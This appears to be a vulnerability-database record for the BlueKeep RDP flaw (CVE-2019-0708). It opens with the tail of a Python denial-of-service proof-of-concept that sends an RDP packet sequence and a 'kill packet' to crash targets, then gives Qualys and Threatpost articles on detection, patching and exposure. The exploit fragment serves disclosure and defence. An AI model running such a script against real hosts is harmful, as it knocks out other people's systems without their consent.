\nsend_client_data(tls) \nprint(\"[+] ClientData Packet Sent\") \n \nsend_channel_packets(tls) \nprint(\"[+] ChannelJoin/ErectDomain/AttachUser Sent\") \n \nsend_client_info(tls) \nprint(\"[+] ClientInfo Packet Sent\") \n \ntls.recv(8192) \ntls.recv(8192) \n \nsend_confirm_active(tls, None) \nprint(\"[+] ConfirmActive Packet Sent\") \n \nsend_establish_session(tls) \nprint(\"[+] Session Established\") \n \nsend_kill_packet(tls, args[2]) \nterminate_connection(tls) \nprint(\"[+] Vuln Should Trigger\") \n \nif __name__ == '__main__': \nif len(sys.argv) != 3: \nprint(\"Usage: python poc.py 127.0.0.1 64\") \nsys.exit() \n \nelif sys.argv[2] == '32' or '64': \n# I've had to send the packets 5 times for hosts that havent \n# had a terminal session since their last reboot. I think \n# I know why but atm its just easier to send the exchange \n# 5 times and it'll crash eventually. Most of the time its \n# the first time though. \nfor _ in range(5): \nmain(sys.argv) \n \nelse: \nprint(\"Usage: python poc.py 127.0.0.1 64\") \nsys.exit() \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/153133/msrdp-dos.txt"}], "qualysblog": [{"lastseen": "2019-06-04T16:24:33", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "This month's Microsoft [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/14/may-2019-patch-tuesday-79-vulns-22-critical-rdp-rce-mds-attacks-adobe-vulns>) included a very high-risk vulnerability (CVE-2019-0708, aka BlueKeep) in Remote Desktop that impacts Windows XP, Windows 7, Server 2003, Server 2008, and Server 2008 R2. This vulnerability allows an unauthenticated attacker (or malware) to execute code on the vulnerable system. It is very likely that PoC code will be published soon, and this may result in a WannaCry-style attack.\n\nMicrosoft has not only released [patches](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) for Windows 7, Server 2008 &amp; R2, but also has taken the extra step to issue [patches](<https://support.microsoft.com/en-gb/help/4500705/customer-guidance-for-cve-2019-0708>) for Windows XP and Server 2003. Patch now!\n\nUPDATE: [Network Level Authentication](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713\\(v=ws.11\\)>) (NLA) partially [mitigates](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) this vulnerability. QID 90788 (Microsoft Windows Network Level Authentication Disabled) can be used to find hosts that have NLA disabled. This forces the attacker to have valid credentials in order to perform RCE.\n\nUPDATE: A new remote (unauthenticated) check was released under QID 91541. See below for details.\n\n### Detecting CVE-2019-0708\n\nQualys has issued a special QID (91534) for [Qualys Vulnerability Management](<https://www.qualys.com/apps/vulnerability-management/>) that covers only CVE-2019-0708 across all impacted Operating Systems, including Windows XP and Server 2003. This QID is included in signature version VULNSIGS-2.4.606-3, and requires authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). Cloud Agents will automatically receive this new QID as part of manifest version 2.4.606.3-2.\n\n##### BlueKeep Unauthenticated check Update:\n\nQualys has also released a new unauthenticated check to address BlueKeep vulnerability:\n\nQID 91541 : Microsoft Windows Remote Desktop Services Remote Code Execution Vulnerability (BlueKeep) (unauthenticated check)\n\nThis QID is included in vulnerability signature version VULNSIGS-2.4.620-x. A Scanner version update (11.2.35) is required to support this new QID. In certain edge cases involving CredSSP, for Windows 7 and above operating systems, this QID may not post as vulnerable, if service is not identified as RDP over port 3389. However, the authenticated check (QID 91534) will post the vulnerability for all affected Operating Systems.\n\nYou can search for all vulnerable systems in AssetView or within the VM Dashboard (Beta) by using the following QQL query:\n\n> vulnerabilities.vulnerability.cveIds:CVE-2019-0708\n\n### Tracking Impact and Remediation\n\nQualys is providing a downloadable AssetView Dashboard for tracking this vuln across your environment. Visit the [Qualys Community](<https://community.qualys.com/docs/DOC-6785>) to download it now for importing into your subscription.\n\n\n\n### Remediating with Qualys Patch Management\n\nCustomers using [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) with Cloud Agent can search for cve:`CVE-2019-0708` in the Patch Catalog, and click \"Missing\" in the side panel to locate and deploy patches to all affected Operating Systems, including Windows XP and Server 2003.\n\nFor emergency patching, you can create an On-demand Job and target it at the \"Cloud Agent\" tag to cover all hosts. For continuous patching, a Daily Job can be created with a 24-hour \"Patch Window\" to ensure all hosts will continue to receive the required patches. This patch does require a reboot.\n\nTargeting specific operating systems is not necessary. The Qualys Cloud Agent already knows which patch is needed for each host.\n\n\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007>).", "modified": "2019-05-16T02:17:00", "published": "2019-05-16T02:17:00", "id": "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch", "type": "qualysblog", "title": "Windows RDP Remote Code Execution Vulnerability (BlueKeep) \u2013 How to Detect and Patch", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T01:02:08", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "The BlueKeep vulnerability, initially released in May 2019, is currently being exploited in the wild. Cybersecurity researchers have spotted initial attacks of Bluekeep RDP vulnerability. Here's a reminder about BlueKeep and instructions for using Qualys to identify attacks and remediate this vulnerability.\n\n### About BlueKeep Attacks\n\nBlueKeep allows an unauthenticated attacker to connect to the target system using Microsoft's RDP protocol to execute code on the vulnerable system. It is wormable remote code execution vulnerability, as it can propagate itself from one vulnerable computer to another without any victim interaction.\n\nRecently, BlueKeep exploitation activity was seen by security researcher Kevin Beaumont, who has been running a worldwide honeypot network named [BluePot to spot exploitation](<https://doublepulsar.com/bluekeep-exploitation-activity-seen-in-the-wild-bd6ee6e599a6>) activities. Fortunately, the attack code seen so far is not wormable. Later on, security researcher Marcus Hutchins analyzed these attacks and found that attackers are scanning internet to search unpatched windows systems with RDP (port 3389) exposed to the internet.\n\nThe unpatched systems running with RDP ports open are highly at risk and immediate action should be taken to remediate vulnerability.\n\n### Protecting from BlueKeep\n\nMicrosoft's [Patch Tuesday, May 2019](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/14/may-2019-patch-tuesday-79-vulns-22-critical-rdp-rce-mds-attacks-adobe-vulns>) included patches for [CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) (aka BlueKeep vulnerability).\n\nQualys released a blog post earlier on how to identify BlueKeep vulnerability in your environment: \n[Windows RDP Remote Code Execution Vulnerability (BlueKeep) \u2013 How to Detect and Patch](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch>)\n\n#### Qualys Threat Protection\n\nIn addition, Qualys just updated BlueKeep as \"Active Attack RTI\" to Qualys customers in [Qualys Threat Protection](<https://www.qualys.com/apps/threat-protection/>) for effectively identifying and tracking the BlueKeep vulnerability.\n\nYou can search for all vulnerable systems in Qualys Threat Protection by using the following QQL (Qualys Query Language) query:\n\nvulnerabilities.vulnerability.threatIntel.activeAttacks:true\n\n\n\n#### Mitigation\n\nAs explained in [the Qualys blog post](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch>), admins are advised to apply the patch as soon as possible.\n\n * Block RDP service (port 3389)\n * Enable NLA - QID 90788 (Microsoft Windows Network Level Authentication Disabled) can be used to find hosts that have NLA disabled.\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, get a [Qualys Suite trial.](<https://www.qualys.com/forms/trials/suite/?utm_source=blog&utm_medium=website&utm_campaign=demand-gen&utm_term=apache-struts-q1-2017&utm_content=trial&leadsource=344554007&_ga=2.207783122.1107359783.1572892611-1000351777.1525114587>)", "modified": "2019-11-04T21:50:34", "published": "2019-11-04T21:50:34", "id": "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/11/04/bluekeep-attacks-observed-months-after-initial-release", "type": "qualysblog", "title": "BlueKeep Attacks Observed Months after Initial Release", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-27T13:23:28", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0708"], "description": "[Recent reports](<https://www.zdnet.com/article/almost-one-million-windows-systems-vulnerable-to-bluekeep-cve-2019-0708/>) this year revealed nearly 1 million computer systems are still vulnerable and exposed to BlueKeep in the wild. These systems are still easy targets for an unauthenticated attacker (or malware) to execute code leveraging this patchable vulnerability. Because so many systems are still vulnerable, Qualys has added its BlueKeep dashboard directly into the product, so you can more easily track and remediate this vulnerability.\n\n### Why is BlueKeep So Critical?\n\nThe [BlueKeep](<https://blog.qualys.com/laws-of-vulnerabilities/2019/05/15/windows-rdp-remote-code-execution-vulnerability-bluekeep-how-to-detect-and-patch>) vulnerability announced earlier in 2019 allows attackers to run arbitrary program code on victims' computers. The vulnerability is found in Remote Desktop Services \u2013 formerly known as Terminal Services \u2013 which affects some older versions of Windows. The Remote Desktop Protocol (RDP) itself is not vulnerable. This vulnerability is pre-authentication and requires no user interaction which makes it capable to widespread attacks because attackers can use automated tools for attacks as this vulnerability is \"wormable.\" This means an attack could spread itself automatically across networks without any intervention by users, just as the [WannaCry](<https://blog.qualys.com/securitylabs/2017/05/12/how-to-rapidly-identify-assets-at-risk-to-wannacry-ransomware-and-eternalblue-exploit>) and [Conficker](<https://blog.qualys.com/laws-of-vulnerabilities/2009/01/22/conficker-worm-explained>) worms have spread in the past.\n\nMicrosoft assigned it the highest severity level of Critical in its [published guidance for customers](<https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708>), and in the US government's National Vulnerability Database, the entry for [CVE-2019-0708](<https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?name=CVE-2019-0708&vector=AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H>) is scored as 9.8 out of 10. Microsoft issued a [blog post](<https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/>) strongly recommending that users install its patches, including on those famous out-of-support operating systems such as Windows XP and Windows Server 2003.\n\n### Workarounds?\n\nThe following [workarounds](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>) may be helpful but in all cases, Microsoft strongly recommends that you install the updates for this vulnerability as soon as possible even if you plan to leave these workarounds in place:\n\n 1. **Enable Network Level Authentication** (NLA) on systems running supported editions of Windows 7, Windows Server 2008, and Windows Server 2008 R2You can enable Network Level Authentication to block unauthenticated attackers from exploiting this vulnerability. With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.[](<https://blog.qualys.com/wp-content/uploads/2019/12/fjblog1.png>)\n 2. **Block TCP port 3389** at the enterprise perimeter firewall: TCP port 3389 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. This can help protect networks from attacks that originate outside the enterprise perimeter. Blocking the affected ports at the enterprise perimeter is the best defense to help avoid Internet-based attacks. However, systems could still be vulnerable to attacks from within their enterprise perimeter.\n 3. Accounts that can be logged into via RDP **require complex passwords** (a long passphrase containing 20+ characters.\n 4. **Install two-factor authentication** (2FA) and at a minimum require it on all accounts that can be logged into via RDP.\n\n### Tracking Impact and Remediation\n\n[](<https://blog.qualys.com/wp-content/uploads/2019/12/fjblog2.png>)The [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>) enables you to continuously monitor for vulnerabilities and misconfigurations and get alerted for your most critical assets. Qualys signature and visualization team have teamed up and included an in-product [BlueKeep dashboard](<https://discussions.qualys.com/docs/DOC-6785-dashboard-toolbox-assetview-qid-91534-cve-2019-0708-bluekeep>) for easy tracking and remediation. This dashboard has been included in Qualys Cloud Platform release 2.42 and can be found within the Dashboard templates library. It will automatically show your systems whether scanned internally, externally or on remote mobile computers with the groundbreaking [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>).\n\n[](<https://blog.qualys.com/wp-content/uploads/2019/12/fjblog3.png>)\n\nThe [dashboard toolbox in Qualys Community](<https://discussions.qualys.com/community/vulnerability-management/tags#/?tags=dashboard_toolbox>) has additional dashboards created by your SMEs and Product Management team that you can import into your subscription.\n\n[](<https://blog.qualys.com/wp-content/uploads/2019/12/fjblog4.png>)\n\n### Remediating with Qualys Patch Management\n\nCustomers using [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) with Cloud Agent can search for cve:`CVE-2019-0708` in the Patch Catalog, and click \"Missing\" in the side panel to locate and deploy patches to all affected Operating Systems, including Windows XP and Server 2003.\n\nFor emergency patching, you can create an on-demand job and target it at the \"Cloud Agent\" tag to cover all hosts. For continuous patching, a daily job can be created with a 24-hour \"patch window\" to ensure all hosts will continue to receive the required patches. This patch does require a reboot.\n\nTargeting specific operating systems is not necessary. The Qualys Cloud Agent already knows which patch is needed for each host.\n\n[](<https://blog.qualys.com/wp-content/uploads/2019/12/fjblog5.png>)\n\nWe should always keep in mind that adversaries don't have to be extremely skilled in finding vulnerable systems. There are tons of scripts, tools and online search engines that can help narrow down and identify systems for reconnaissance and further the Cyber Kill Chain steps for exploitation.\n\n[](<https://blog.qualys.com/wp-content/uploads/2019/12/fjblog6.png>)\n\n### Get Started Now\n\nTo start detecting and remediating this vulnerability now, sign up for a [Qualys Suite trial](<https://www.qualys.com/forms/trials/suite/>).", "modified": "2019-12-20T16:00:59", "published": "2019-12-20T16:00:59", "id": "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "href": "https://blog.qualys.com/technology/2019/12/20/blue-is-a-color-we-love-but-cant-keep", "type": "qualysblog", "title": "Blue\u00a0is a\u00a0color we love but can\u2019t Keep!", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-10T12:13:11", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "Patch management is a thankless job. Data shows, despite best efforts, that 80 percent of enterprise applications have at least one unpatched vulnerability in them, according research by[ Veracode](<https://www.veracode.com/state-of-software-security-report>).\n\nIt is not for lack of trying that vulnerabilities persist. Last year 16,500 [vulnerabilities were reported](<https://www.cvedetails.com/browse-by-date.php>), making patching each one nearly an impossible task for any one company. Perhaps it shouldn\u2019t be a surprise that Windows patching times appear to be moving in the wrong direction. According to Edgescan, the average of 63 days to patch in 2017 to 81 days in 2018.\n\nWhat these statistics reveal is a process suffering under the weight of a shifting IT ecosystem that has ballooned to include a flood of bug submissions from a new crop of bounty programs, scrutinizing the growing army of chip-enabled gear.\n\nThe good news is that there\u2019s hope. Patching experts say there are concrete steps companies can take to avoid patch fatigue. Identifying the problems is an important first step.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103016/Veracode_Vulns_Numbers.png>)\n\nClick to Enlarge (courtesy Veracode)\n\n## Building a Better Patch Process\n\n\u201cOne of the biggest patching challenges is first identifying everything that needs to be patched,\u201d said Chris Goettl, director of product management and security for Ivanti. \u201cThe challenge becomes keeping a handle on how big a company\u2019s universe of devices is \u2014 and knowing what has been patched and what still needs to be.\u201d\n\nAdd in vulnerabilities related to software dependencies, such as the third-party code underlying software, and patching becomes even more arduous. Code repositories, open-source projects and small vendors poorly communicate bugs in their often complex library dependencies, he said.\n\n[Stagefright](<https://threatpost.com/stagefright-2-0-vulnerabilities-affect-1-billion-android-devices/114863/>), [Devil\u2019s Ivy](<https://threatpost.com/bad-code-library-triggers-devils-ivy-vulnerability-in-millions-of-iot-devices/126913/>) and the [Zip Slip flaw](<https://threatpost.com/zip-slip-flaw-affects-thousands-of-open-source-projects/132577/>) are just of few examples of vulnerabilities affecting thousands of open-source projects. And last month, VLC developer VideoLAN alerted customers [of a \u201chigh-risk\u201d bug](<https://threatpost.com/high-risk-vlc-media-player-bugs/147503/>) tied to a third-party component called MKV demuxer \u2014 a component responsible for multiplexing digital and analog files. The bug could allow an adversary to craft a malicious .MKV video file that could be used in an attack to gain control of the victim\u2019s PC, according to VideoLAN.\n\n\u201cWe assume a given developer is going to provide patches for their code. Obviously, they are going to fix any of vulnerabilities. But almost every product these days is based on other third-party components. There is Apache Struts, Microsoft .NET core and Java development kits. It\u2019s very important that the components are updated as well,\u201d said Todd Schell, senior product manager, security, for Ivanti.\n\nThese are vulnerabilities that are compiled into the code and aren\u2019t something found by regular IT staff, Schell said. Developers, not just IT and security operations staff, need to be aware \u2013 pushing companies to adopt a DevOps approach to security.\n\n## A Race to Zero\n\nGoettl also noted that there is a race by hackers and researchers alike to shrink the time between a zero-day bug discovery and the publishing of a proof-of-concept (PoC) exploit of the flaw.\n\nIn the case of the \u201cwormable\u201d vulnerability known as BlueKeep ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)), [Microsoft patched the bug on May](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>) 14, and by May 22 a [proof-of-concept (PoC) exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) of the flaw was demonstrated. Other [PoCs followed](<https://threatpost.com/working-bluekeep-exploit-developed-by-dhs/145784/>) in the [subsequent months](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>). On Thursday, Palo Alto Networks published [three additional](<https://unit42.paloaltonetworks.com/exploitation-of-windows-cve-2019-0708-bluekeep-three-ways-to-write-data-into-the-kernel-with-rdp-pdu/>) ways to exploit system that have not been patched for BlueKeep.\n\nPoCs offer security professionals vital and needed clues on how to identify a threat and mitigate against it. But, if patching isn\u2019t part of the PoC discovery and fix, it could lead to catastrophic results \u2013 think [EternalBlue and WannaCry](<https://threatpost.com/tag/wannacry/page/3/>).\n\nAs of July, the number of systems that remain exposed and unpatched to BlueKeep is [close to 800,000](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>), according to BitSight.\n\n## Making Sense of CVSS Scores\n\nTyler Reguly, manager of security, researcher and development for Tripwire, points out that the sheer number of patches that face IT and security teams leads to patch fatigue. The Common Vulnerability Scoring System (CVSS) is an industry standard for assessing the severity of security vulnerabilities and is meant to help with that; CVSS scores assign severity scores to vulnerabilities with the intent of giving security professionals the ability to prioritize responses.\n\nHowever, oftentimes the severity score is higher than the threat really warrants; and sometimes it\u2019s the other way around, Reguly said.\n\n\u201cWhat you end up with is a lot of people looking at these CVSS scores, confused, asking themselves \u2018what should I patch, when should I patch it,'\u201d he said.\n\nMatthew Howell, senior director of product for Flashpoint, recommends that when it comes to patch prioritization, IT needs to evaluate the threat variables of a bug as they relate to one\u2019s specific network. In a recent [blog post, he recommends](<https://www.flashpoint-intel.com/blog/a-clean-view-of-vulnerabilities-helps-prioritize-patching/>) that security teams ask themselves:\n\n * _ How likely the vulnerability is to be exploited in the wild?_\n * _ If the vulnerability is exploited in the wild, how likely it is to impact your organization?_\n * _ If the vulnerability is exploited at your organization, what impact it is likely to have? _\n\nThe CVSS score assigned to a vulnerability reflects severity, not risk, Howell wrote.\n\n## Automating the Patching Process\n\nReguly says one of the best antidotes to fend off patching fatigue is automating as much of the patching process as possible. \u201cYou really need to architect to automate. That includes patching software, but also the processes as well,\u201d he said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/25161620/Patch-Management.jpg>)That includes configuring orchestration tools such as Puppet to help automate the patching process. \u201cIf possible, some patch software supports APIs [and] can be used to tie in through an API for patch management and configuration management,\u201d Reguly said.\n\nHe said automation also includes patch validation and making sure patches and security updates are implemented properly. Lastly, he recommends determining if a software vendor\u2019s service-level agreement might also be leveraged to help with the patching process.\n\n## Driving a Stake in the Heart of a Check-Box Security Mentality\n\nJimmy Graham, senior director of vulnerability management, for Qualys, calls the process vulnerability management, not just patch management. He warns against focusing exclusively on patch management to the exclusion of the bigger security picture.\n\nHe promotes the idea of vulnerability management lifecycles that start with asset inventory, collecting vulnerability information locally, prioritizing vulnerabilities and then moving to patch management.\n\n\u201cPatch management is a cyclical process where you are patching systems based on the fact a patch was released by a vendor. Vulnerability management is there to make sure that patching was effective as well as the configuration management,\u201d Graham said.\n\n## Best Practices\n\nBest practices, according to Graham, include creating a patching cadence based on vendor releases. IT should also identify and prioritize patches based on the company\u2019s unique infrastructure, and then test and deploy the patches themselves. Follow-up is just as important, he said, such as documenting the process for each technology patched \u2014 from operating systems to databases.\n\nHe also recommends patching and updating \u201cgolden images\u201d (master software images used by IT for mass software deployment) at least quarterly. \u201cThat way all new systems are remediated before they go into production,\u201d he said.\n\nThe goal is to significantly reduce or eliminate one-off patching.\u201dIf you\u2019ve ever tried to figure out what version of Flash to deploy, then you aren\u2019t doing it right,\u201d Graham said.\n\n**[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/03103951/DevOps.jpg>)**\n\n## The DevSecOps Approach\n\nStill others advocate taking a DevSecOps approach to security \u2014 i.e., a blending of software development, IT operations and security practices into a streamlined system lifecycle.\n\n\u201cThere is a strong correlation between how many times an organization scans and how quickly they address their vulnerabilities,\u201d Veracode said in [its _State of Software Security_ report](<https://www.veracode.com/state-of-software-security-report>). \u201cDevOps, or agile-driven development teams, are scanning more often, and as a result, they are making incremental [security] improvements every time they test.\u201d\n\nVeracode asserts that once organizations hit 300 or more internal scans per year, companies are seeing the \u201cfix velocity going into overdrive.\u201d Therefore, DevSecOps in theory could be vital when it comes to spotting bugs early in the development process \u2013 making vulnerabilities easier, faster and less expensive it is to fix, [security experts say](<https://threatpost.com/how-to-solve-the-developer-vs-cybersecurity-team-battle/133759/>) .\n\nThere\u2019s a caveat to this though: The idea presupposes an unlikely harmonious relationship between developers and security teams. Often development teams are under pressure to deliver feature-rich applications on near impossible deadlines. Security teams, on the other hand, are under growing pressure to safeguard data.\n\n## Patching Landscape Moves to Cloud\n\nThings are changing in the patching landscape as more compute moves to the cloud. Applications such as Salesforce and Office 365 represent a growing number cloud-based solutions running on AWS, Google Compute and Microsoft Azure. As the move to cloud services grows, cloud providers share the responsibility for security with their customers, Schell said.\n\nThe Cloud Native Computing Foundation, the organization behind popular container project Kubernetes, has had to tackle a number of [vulnerabilities in its platform](<https://github.com/kubernetes/kubernetes>). One bug [found last month](<https://groups.google.com/forum/#!topic/kubernetes-security-announce/vUtEcSEY6SM>) could allow an adversary to access, modify or delete computing and storage resources configured across a cluster. Also last month there was an Azure update addressing a Kubernetes component that had a known vulnerability.\n\nThe shift from on-premise to off-premise (cloud) computing is a game changer for security teams, and it forces them to forfeit some control to platform providers, Schell said.\n\n\u201cIt\u2019s fully upon the shoulders of the [cloud] service provider to make sure the application is running with the most recent performance enhancements and security updates. And there is not much we can do as users,\u201d he said.\n\n_(A portion of this article is adopted from a previous Threatpost webinar \u201c[Streamlining Patch Management](<https://threatpost.com/streamlining-patch-management-expert-advice/146686/>)\u201c. In this 60-minute presentation, available on-demand, experts Todd Schell, senior product manager, security, for Ivanti; Tyler Reguly, manager of security R&amp;D, for Tripwire; and Jimmy Graham, senior directory, vulnerability management, for Qualys, are joined by Threatpost editor Tom Spring to discuss streamlining patch management and offer patching advice, tips and tricks.)_\n", "modified": "2019-09-03T18:17:11", "published": "2019-09-03T18:17:11", "id": "THREATPOST:472451689B2FA39FCB837D08B514FF91", "href": "https://threatpost.com/how-to-handle-patch-management/147909/", "type": "threatpost", "title": "How to Get a Handle on Patch Management", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-22T21:49:04", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "For the past two months, security researchers have been sounding the alarm about BlueKeep, a critical remote code-execution vulnerability in Microsoft Windows that researchers said could lead to a \u201cmega-worm\u201d global infection. As of July 2, approximately 805,665 systems remain online that are vulnerable to BlueKeep, according to a status update.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/17155620/bluekeep.png>)\n\nSource: BitSight\n\nThe number of susceptible systems represents a decrease of 17.18 percent (167,164 systems) compared to May 31, including 92,082 systems which remain externally exposed that have been patched. This translates to an average decrease of 5,224 exposed vulnerable exposed systems per day, between patching, taking them offline and replacing them.\n\nThe BlueKeep vulnerability ([CVE-2019-0708](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>)) RCE flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003, Server 2008 and Server 2008 R2. The main thing that sets BlueKeep apart is the fact that it\u2019s wormable \u2013 and so it can self-propagate from machine to machine, setting up the scene for a WannaCry-level, fast-moving infection wave.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe concern is big enough that Microsoft even took the unusual step of deploying patches to Windows XP and Windows 2003, which are end-of-life and no longer supported by the computing giant. It has also issued multiple follow-on advisories urging administrators to patch.\n\n## Patches Slowly Roll Out\n\nBitSight\u2019s analysis shows a mixed report card on how well organizations have closed that security hole, with a variable amount of progress made within each industry.\n\nBitSight found that the most responsive industries in mitigating BlueKeep have been legal, nonprofit/NGO and aerospace/defense with a 32.9 percent, 27.1 percent and 24.1 percent respective reduction in the number of organizations affected.\n\nConversely, the consumer goods, utilities and (ironically) technology industries have been the least responsive, with only 5.3 percent, 9.5 percent and 11.7 percent of organizations respectively having taken an.\n\n> **_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT._**\n\nIn terms of geography, China and the United States still have the highest number exposed systems.\n\nYet, China showed the highest absolute improvement by reducing the number of exposed vulnerable systems by 109,670, which represents a 23.9 percent decrease. The United States followed suit by showing 26,787 fewer vulnerable systems exposed as of July 2, representing a 20.3 percent decrease.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/17155817/bluekeep-2.png>)\n\nClick to enlarge. Source: BitSight.\n\nOther countries showing a notable reduction in exposed systems were Colombia (21.3 percent decrease), Latvia (20.7 percent decrease) and Guatemala (a 45.4 percent decrease).\n\nOn the flip side, South Korea actually showed an 14.5 percent increase in the time period of 3,430 vulnerable exposed systems, and Estonia with 146, a 32.2 percent increase.\n\nFausto Oliveira, principal security architect at Acceptto, told Threatpost that patching is easier said than done.\n\n\u201cSome companies have very rigid change-management intervals due to regulatory constraints, others have very rigid internal change-management procedures \u2013 and finally, because there are RDP servers (unfortunately) inside the organization that fall outside of the remit of corporate IT,\u201d he said via email. \u201cThe fact that these are older machines are no longer supported by Microsoft could be a factor in the slow patching, especially in legacy systems that have poor documentation, and/or sometimes are outside of the supervision of corporate IT. There are some false misconceptions on the market, like if the OS is going end-of-life, let\u2019s not spend money on it until we replace it, which sometimes could be years away.\u201d\n\n## Very Real Exploit Danger\n\nIn June, [a working exploit](<https://threatpost.com/bluekeep-mega-worm-looms-as-fresh-poc-shows-full-system-takeover/145368/>) for the flaw showed how an unauthenticated attacker could achieve full run of a victim machine in about 22 seconds. Reverse engineer Z\u01dd\u0279osum0x0 released a video showing an RCE exploit working on a Windows 2008 desktop, paired with a Mimikatz tool to harvest login credentials.\n\nAn [earlier proof-of-concept](<https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/>) (PoC) from McAfee showed a successful RCE exploit, but didn\u2019t include the credential-harvesting \u2013 so a mitigating factor in that exploit would be the need for an attacker to bypass network-level authentication protections.\n\n\u201cThe exploit is quite significant given the number of affected systems, which gives an attacker the ability not only of hijacking these machines, but to use them to further penetrate other systems and services inside the organization,\u201d Oliveira said. \u201cThe type of risks that organizations are facing are wide, just to name a few: once the exploit is in place the attacker can exflitrate data from the RDP server, obtain credentials, disrupt the operations of the organization or use the RDP server as a jumping point to access further resources inside the company.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. [Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>) _**\n", "modified": "2019-07-17T20:55:43", "published": "2019-07-17T20:55:43", "id": "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "href": "https://threatpost.com/805k-windows-systems-open-bluekeep/146529/", "type": "threatpost", "title": "Wormable BlueKeep Bug Still Threatens Legions of Windows Systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:42:44", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "The wave of [BlueKeep attacks](<https://threatpost.com/805k-windows-systems-open-bluekeep/146529/>) that security experts predicted could take down systems globally have arrived, but they are not in showing the form nor the destructive impact experts initially feared.\n\nSecurity researchers have seen evidence of the first wave of attacks on the zero-day Windows Remote Desktop vulnerability revealed by Microsoft in May. At the time experts said BlueKeep posed threat to millions of internet-connected systems, with the capability to spread an automated 